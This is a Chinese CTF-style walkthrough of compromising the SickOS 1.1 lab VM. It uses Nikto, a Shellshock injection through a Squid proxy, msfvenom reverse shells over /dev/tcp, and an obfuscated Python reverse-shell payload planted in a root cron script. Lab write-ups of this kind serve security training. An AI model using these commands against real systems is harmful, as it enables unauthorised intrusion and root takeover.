SickOS1.1 - Shellshock原理和利用过程精讲

SickOS1.1的另一种思路;用另一种方法打透这台机器

微信公众号

Nikto扫描

正常都是-h扫描;有代理就用-useproxy 指向的代理ip:端口

nikto -h 192.168.218.157 -useproxy 192.168.218.157:3128

apache版本,有点低,现在都是2.4.54版本了,可能也有漏洞利用方法、同样也有squid/3.1.19

还提示了一个OSVBD的一个编号,shellshock漏洞,应该是关于apche的

image-20240531223535986

shellshokc漏洞原理

/cgi-bin/status目录

通过bash获得权限、只要通过环境变量与bash有操作的,4.1版本之前都可以的,

shellshokc验证

curl -v --proxy http://192.168.218.157:3128 http://192.168.218.157/cgi-bin/status -H "Refer:() {  test;}; echo 'Content-Type: text/plan'; echo; /usr/bin/id;exit"

这里我们使用curl

-v更丰富信息

–proxy指定代理服务器

uid=33(www-data) gid=33(www-data) groups=33(www-data)这个就说明有shellshokc

image-20240531235748513

shellshock获取初始系统shell

生成payload

msfvenom -p cmd/unix/reverse_bash lhost=192.168.218.145 lport=443 -f raw

bash -c '0<&84-;exec 84<>/dev/tcp/192.168.218.145/443;sh <&84 >&84 2>&84'

运行payload

curl -v --proxy http://192.168.218.157:3128 http://192.168.218.157/cgi-bin/status -H "Refer:() {  test;}; 0<&84-;exec 84<>/dev/tcp/192.168.218.145/443;sh <&84 >&84 2>&84"curl

开启监听,但是sh好像出问题了

没有那个文件或者路径

image-20240601000827451

msfvenom生成的不完全对,sh未必环境变量设好,就没法使用,简写的路径不行,要写成完整的路径

image-20240601001156372

cron自动任务提权

将sh改为/bin/sh就可以了

dpkg -l可以看一下装了哪些软件

image-20240601001332552

解决下shell问题;一般是python

python -c 'import pty;pty.spawn("/bin/bash")'

目前到这里我们可以继续上一篇文章思路继续走,我们再找一找其他更好方法

看一下sudo -l 要密码,我们通过反弹shell获得交互式,暂时无法走通这个路

看一下本地文件内status

image-20240601002350526

看到这想到上一个靶机进行自动任务提权条件,root;然后cho “/bin/bash -i >& /dev/tcp/192.168.218.145/4443 0>&1” >> /usr/lib/cgi-bin/status

运行./,确实能够再次交互,但不是root用户,还是相同用户,回头一想,这可能不是自动任务,还是以本地用户权限运行,可以使用sudo来运行,但咱不知道www-data密码,所以这个路也不行

换个思路,这个用户www-data主要是为网站使用,进入html看有啥提示;html进不去,那就逐级进入看

image-20240601003458236

看一下robots.txt就是暴露wolf管理系统信息

image-20240601003557521

看一下.bash_history历史记录;没什么有用信息

image-20240601003647062

再往下看文件;打印两句话,我试着非常频繁地连接事物,您可能想尝试我的服务;

那可能是定时任务;

image-20240601003749396

当然在实战中不会有这样的提示,我们攻击要形成即使不提示都要对这些基本能提权的思路去提取信息

进入/etc/看一下crontab

貌似没啥东西

image-20240601004510830

但我们也看到了cron.d;顺便也看一下

他说这是一个路径

image-20240601004615834

ls -laih看一下

.placeholder是一个占位符

automate说每分钟以root权限python运行/var/www/connect.py文件;那我们思路就很明确了

image-20240601004822550

rooted

既然他是py文件,那我们就用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.218.145 lport=222 -f raw

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNp9j0ELwjAMhf9K6akF6WxRmYwehkwQUcHtPlytbDjbsnT/35VVvC2XkPe9vJDu4+zgEVj11h6tUCgYGzdYpQGiYCFDrQUvMd8LxncpEzxlfLPFGQrrUgiRIZBzCpsbiVN+rE/Xovplz2J5O5zrsroX+YVOm0xZY7TyhIQz0RqS6UQtsOfoBAH26nptLKHRsF6CfAmKCTr5/5OpR98TnDSdSaDF9AvvrlGY')[0])))"

这个写入python文件的编辑器非常诡异

vi与vim;看博主说用vi,按o是另起一行,然后粘贴,

esc然后冒号wq,可能只是视图效果不好吧

image-20240601010200741

cat看一下,正常

image-20240601010219572

监听;有反应,root用户;a0216ea4d51874464078c618298b1367.txt与上一篇文章一样,自动任务提权也完成了

image-20240601010528598

总结

nikto扫描出shellshock漏洞、使用curl指定代理服务器测试一下,正常,使用msfvenom生成bash的反弹shell,是初级权限用户,进行信息收集,自动化任务有提权方法,构造py再次获得反弹shell,再次拿到root

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/670567.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Cobaltstrike常用功能

一、快捷工具栏 3、需要创建监听器&#xff0c;才能让靶机上线&#xff0c;连接我们公网服务端上去开启的帧监听端口&#xff0c;做任何操作 都是通过服务器的IP地址去连接靶机&#xff0c;去和靶机进行文件stage的一个传输和交互。这里推荐把cs 放到公网上边&#xff0c;比较…

通过LabVIEW提升生产设备自动化水平

现代制造业对生产设备的自动化水平提出了越来越高的要求。使用LabVIEW这一强大的图形化编程环境&#xff0c;可以显著提升生产设备的自动化程度&#xff0c;改善生产效率和产品质量。本文将详细分析如何通过LabVIEW改善生产设备的自动化水平&#xff0c;并提供具体的实施策略与…

数论1---整除

概念与基本性质就不说了 例题1&#xff1a;已知a|n&#xff0c;b|n.且axby1,求证&#xff1a;ab|n 即&#xff1a; 所以&#xff1a;ab|n 例题2&#xff1a;设m是一个大于2的正整数&#xff0c;证明&#xff1a;对于任意正整数n&#xff0c;都有 由于我不想打公式了直接拍照…

opencv进阶 ——(九)图像处理之人脸修复祛马赛克算法CodeFormer

算法简介 CodeFormer是一种基于AI技术深度学习的人脸复原模型&#xff0c;由南洋理工大学和商汤科技联合研究中心联合开发&#xff0c;它能够接收模糊或马赛克图像作为输入&#xff0c;并生成更清晰的原始图像。算法源码地址&#xff1a;https://github.com/sczhou/CodeFormer…

SAP PP学习笔记14 - MTS(Make-to-Stock) 按库存生产(策略10),以及生产计划的概要

上面讲了SAP里面的基础知识&#xff0c;BOM&#xff0c;作业手顺&#xff08;工艺路线&#xff09;&#xff0c;作业区&#xff08;工作中心&#xff09;&#xff0c;MRP&#xff0c;MPS等概念&#xff0c;现在该到用的时候了。 SAP PP学习笔记07 - 简单BOM&#xff0c;派生BO…

【教程】如何实现WordPress网站降级(用于解决插件和主题问题)

在最新可用版本上运行WordPress安装、插件和主题是使用该平台的关键最佳实践。还建议使用最新版本的PHP。但是,在某些情况下,这是不谨慎或不可能的。 如果您发现自己处于这种情况,您可能需要撤消更新并降级您的WordPress网站(或其中的一部分)。幸运的是,有一些方法可用于…

uniapp 怎么设置凸起的底部tabbar

1. uniapp 怎么设置凸起的底部tabbar 1.1. 方案一系统提供 1.1.1. 使用uniapp官方提供的属性midButton 使用时&#xff0c;list数组须为偶数 &#xff08;1&#xff09;pages.json "tabBar": {"custom": true,"color": "#8F8F94",&q…

推荐网站(19)anytools图片分辨率处理网站

今天&#xff0c;我要向您推荐一个非常实用的在线图片处理工具网站——AnyTools。这个网站提供了一站式的图片分辨率处理服务&#xff0c;并且具备添加各种过滤器的功能&#xff0c;非常适合需要快速调整图片大小和风格优化的场合。 多分辨率支持&#xff1a;用户可以自定义图片…

(南京观海微电子)——LVD屏介绍

LVDS&#xff08;Low Voltage Differential Signaling&#xff0c;即 低电压差分信号 &#xff09; 接口又称 RS-644 总线接口&#xff0c;是20世纪90年代才提出的一种 数据传输 和接口技术。 LVDS接口是美国NS美国国家半导体公司为克服以 TTL电平 方式传输宽带高码率数据时功…

Linux--线程的互斥

线程系列&#xff1a; 一、线程的认识&#xff1a;线程的认识&#xff1a;误进解线程的概念和线程的基本控制 二、Linux–线程的分离、线程库的地址关系的理解、线程的简单封装 线程的互斥 线程互斥&#xff08;Thread Mutual Exclusion&#xff09;是多线程编程中的一个重要概…

软件测试进阶

目录 一、自动化测试 1.概念 2.Selenium 2.1 概念 2.1.1 Selenium是什么&#xff1f; 2.1.2 Selenium特点 2.1.3 工作原理 2.2 SeleniumJava环境搭配 2.3 定位元素 2.3.1 CSS语法 2.3.2 XPath语法 2.4 应用 2.4.1 点击提交文本 2.4.2 模拟输入 2.4.3 清除文本 2…

驰骋低代码开发平台概念与主张

驰骋低代码开发平台概念与主张 一、引言 在数字化转型的浪潮中&#xff0c;低代码开发平台因其高效、灵活、成本效益显著的特点&#xff0c;逐渐成为企业快速构建应用系统的首选。作为国内领先的开源低代码开发平台&#xff0c;驰骋低代码致力于为企业和开发者提供一套全面、…

(南京观海微电子)——屏幕材质及优缺点对比

LED/LCD LCD&#xff08;Liquid Crystal Ddisplay&#xff09;即“液晶显示器”&#xff0c;由两块偏光镜、两块薄膜晶体管以及彩色滤光片、光源&#xff08;荧光灯&#xff09;、显示面板组成的成像元器件。 LED&#xff08;Light Emitting Diode&#xff09;即“发光二极管…

冒泡排序与快速排序

博主主页: 码农派大星. 数据结构专栏:Java数据结构 数据库专栏:MySQL数据库 关注博主带你了解更多数据结构知识 1.冒泡排序 冒泡排序 private static void swap(int[] arrary,int i,int j){int tmp arrary[i];arrary[i] arrary[j];arrary[j] tmp;public static void bubbl…

[docker] docker 安全知识 - docker api, 权限提升 资源管理

[docker] docker 安全知识 - docker api, 权限提升 & 资源管理 这是 docker 安全的最后一篇 暴露 docker api 在 [docker] docker 安全知识 - docker 系统性简介 中曾经提到&#xff0c;docker cli 使用 restful api 与客户端和 docker daemon 之间交流。默认情况下&…

国内的期权模拟账户怎么申请?

国内的期权模拟账户可以在券商和期权分仓平台处申请开通&#xff0c;期权相比于股票具有杠杆投资、风险控制等新特性。 期权模拟交易客户端能够提供期权的开平仓交易、备兑开仓&#xff0f;平仓、行权等交易指令&#xff0c;下文为大家介绍国内的期权模拟账户怎么申请&#xff…

安卓模拟键盘蓝牙电脑apk

蓝牙连接电脑就可以使用了。 下载地址&#xff1a;点击下载https://download.csdn.net/download/jasonhongcn/89382597

【基础算法总结】模拟算法

模拟算法 1.替换所有的问号2.提莫攻击3.Z 字形变换4.外观数列5.数青蛙 点赞&#x1f44d;&#x1f44d;收藏&#x1f31f;&#x1f31f;关注&#x1f496;&#x1f496; 你的支持是对我最大的鼓励&#xff0c;我们一起努力吧!&#x1f603;&#x1f603; 模拟算法 —> 比葫芦…

npm发布、更新、删除包

如何将自己开发的依赖包发布到npmjs上供别人使用&#xff1f;五个步骤搞定&#xff01; 实现步骤&#xff1a; 创建自己的工具包项目&#xff0c;进行开发。注册npmjs账号。执行npm login在控制台登录&#xff0c;填写用户信息。执行npm publish发布包。更新及删除。 步骤一…

Leetcode - 周赛399

目录 一&#xff0c;3162. 优质数对的总数 I 二&#xff0c;3163. 压缩字符串 III 三&#xff0c;3164. 优质数对的总数 II 四&#xff0c; 3165. 不包含相邻元素的子序列的最大和 一&#xff0c;3162. 优质数对的总数 I 假设 x 是 nums1 数组中的值&#xff0c;y 是 nums2…